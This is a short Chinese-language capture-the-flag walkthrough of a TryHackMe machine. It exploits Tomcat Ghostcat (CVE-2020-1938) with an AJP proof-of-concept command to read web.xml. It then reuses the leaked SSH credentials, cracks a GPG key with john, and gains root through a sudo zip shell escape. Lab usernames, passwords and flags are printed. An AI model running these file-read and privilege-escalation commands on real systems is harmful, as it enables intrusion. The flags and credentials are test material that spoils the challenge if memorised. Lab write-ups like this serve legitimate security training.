端口扫描

Web

8080端口登进发现是一个tomcat的网页

扫目录也只是扫出这三个

根据提示是一个CVE-2020-1938

下载POC

python3 ajpShooter.py http://10.10.152.114:8080 8009 /WEB-INF/web.xml read

可能读取服务器的配置文件

找到了一个用户名和密码

skyfuck:8730281lkjlkjdqlksalks

ssh登录，发现家目录里面有两个文件

cat /etc/passwd

发现还有一个叫merlin的用户，大概率是要转移到他那边

用scp将那两个文件下载到kali，应该是一个GPG文件还有那对应的密钥

发现导入密钥时还要密码

那就用john来爆破

gpg2john tryhackme.asc >hash.txt

将密钥转成可爆破的hash

gpg --import tryhackme.asc

gpg --decrypt-file credential.pgp

得到凭据:

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

转移到merlin

user.txt

THM{GhostCat_1s_so_cr4sy}

sudo -l

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

提权成功

root.txt

THM{Z1P_1S_FAKE}

挺简单的一台机器，嗯基本上都是学过的点，没啥好说的233